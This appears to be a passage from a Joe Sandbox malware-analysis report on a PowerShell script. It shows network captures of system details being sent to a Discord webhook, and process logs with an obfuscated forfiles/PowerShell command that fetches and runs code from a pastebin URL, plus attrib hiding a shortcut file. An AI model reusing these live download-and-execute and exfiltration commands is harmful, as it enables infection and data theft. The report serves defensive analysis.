                                                            2024-10-15 15:58:23 UTC | 1378 | IN | Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 15:58:23 UTC | 1378 | IN | Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 15:58:23 UTC | 1378 | IN | Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 15:58:23 UTC | 1378 | IN | Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 15:58:23 UTC | 618 | IN | Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.8 | 49717 | 162.159.136.232 | 443 | 5180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 15:58:30 UTC | 311 | OUT | POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:30 UTC | 299 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 5f 5f 5a 43 43 31 39 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** A__ZCC19\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 15:58:30 UTC | 1257 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 15:58:30 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729007911
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjDcbXOtu8bjtVf6UAQTIHmcX3N1YRay35WRcBJEklTHaXW5y8fHiwFoTubuCmErCybkxzVGv%2F8FR0Jgr1Cu2v4SisBHOZhAuPrV3eN468cKhBsNItqX%2BTH6%2BYQp"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=19a8aa67251f730d1a261752bff7f45d45000c44-1729007910; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=sUAjXejYQfsWL.eiu_X9eQrmoyrWjOvVstrleAJG2ZQ-1729007910365-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102cf2cef461a-DFW
                                                            2024-10-15 15:58:30 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.8 | 49718 | 162.159.136.232 | 443 | 2716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 15:58:36 UTC | 311 | OUT | POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:36 UTC | 299 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 5f 5f 5a 43 43 31 39 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** A__ZCC19\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 15:58:37 UTC | 1251 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 15:58:36 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729007918
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5rW2ejVkeP9d6fx5BgcD39XtRYbhZ13KlAeK4EP3cESF0Fee9RUk7FuTNVA3mGkjYwemcC1x%2FJyvOD0BcrV7UQ3U0uXXktV6qfbLRpLdciqVijT0oTT7xdKo2KP"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=17847e3806a41616fa7f1cec02ab096d50e81535-1729007916; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=bhfVtuJAed2Y8F6zsSmHM7BsWdGa30oKEA6EcrLXXC0-1729007916984-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102f8887ee70e-DFW
                                                            2024-10-15 15:58:37 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}



                                                            Target ID:0
                                                            Start time:11:57:57
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:11:57:57
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff6fa080000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff74c170000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:11:58:11
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff6fa080000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:11:58:19
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                              • Instruction ID: f9dfb4fc12b4a4830b1d7f46e5820820b61b000959bd1c8e698fab6ec6df47d2
                                                              • Opcode Fuzzy Hash: ba99fcab006e2283de4e486bc59220d5131441fc60fe88016fcd78240b404c70
                                                              • Instruction Fuzzy Hash: EED176B292EA8A1FE796EF78D8551B57FE0EF0A314B0801FED08DC70A7D9189806C751
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfb4092175eaaa5f52e2da53179996a4abedbfafaf3350e128515093aeb6b373
                                                              • Instruction ID: 053d73b01e4140f0e5fc6c63cadb3c0ebcc9f3a1d20249d5c80e6d048b21be06
                                                              • Opcode Fuzzy Hash: cfb4092175eaaa5f52e2da53179996a4abedbfafaf3350e128515093aeb6b373
                                                              • Instruction Fuzzy Hash: C5B1C67050CA4D8FEB69EF28D8557E93BD1FF55311F04826EE84DC7291CA34A945CB82
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d375de6a24e7ef4d0bb4283e8eba75b90bfe7cc68931273c3be926b457c873e0
                                                              • Instruction ID: 81d4ea94aa6a3ef426524592f6826e33322cd1c3d04f7848c57ef0ec538c7f37
                                                              • Opcode Fuzzy Hash: d375de6a24e7ef4d0bb4283e8eba75b90bfe7cc68931273c3be926b457c873e0
                                                              • Instruction Fuzzy Hash: C051D0B1A1CA594FEB9CEF68C9556B877D1FF99302F0540B9D54DC36A3CD28B8028741
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f15283480ccf63c9f1a52236dadd1bde72feb63f2679ec816aa9739f4b9bad72
                                                              • Instruction ID: 69253a902599c239ce0d66d233f5bc75a862750c9bdb5e9b0dde511b509761fb
                                                              • Opcode Fuzzy Hash: f15283480ccf63c9f1a52236dadd1bde72feb63f2679ec816aa9739f4b9bad72
                                                              • Instruction Fuzzy Hash: 8B31307081D55D8EFBB8BF35CE4ABF43290FF45316F408539D60EC62A2DA386945CA01
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f139f9fb21c5593ac25b4d013256b826e07bc84ad366bfffb688c28c267c964
                                                              • Instruction ID: c43006983fe592537a034ff1e59657725035f0951cb584d9301f742d495c9db9
                                                              • Opcode Fuzzy Hash: 3f139f9fb21c5593ac25b4d013256b826e07bc84ad366bfffb688c28c267c964
                                                              • Instruction Fuzzy Hash: DD21A1B6A0D7914FE71BAB38D8A60E43FA0DF9323170945F7C586CA0B3D519284BC7A5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88cac8ba1e8f8c0c6267c2230cd4e444b17f69a6328757026bb5f95b78e7c853
                                                              • Instruction ID: 56c69ca27f323f995b9471cba76fc8add5b38f00b74872cb0b5cbe3a0ea522b5
                                                              • Opcode Fuzzy Hash: 88cac8ba1e8f8c0c6267c2230cd4e444b17f69a6328757026bb5f95b78e7c853
                                                              • Instruction Fuzzy Hash: C5114270A1CA198FD759EF28D4566AD76D1FF8C701F10427DE48ED3692CE28A8024786
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction ID: 5bc9b09ee87c1ac689be063acc19aa175c0b8873c348cf8793d6a55d0ae7157e
                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction Fuzzy Hash: 5601A77110CB0C8FDB48EF0CE051AA5B7E0FB85324F10056DE58AC3661DA32E882CB45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
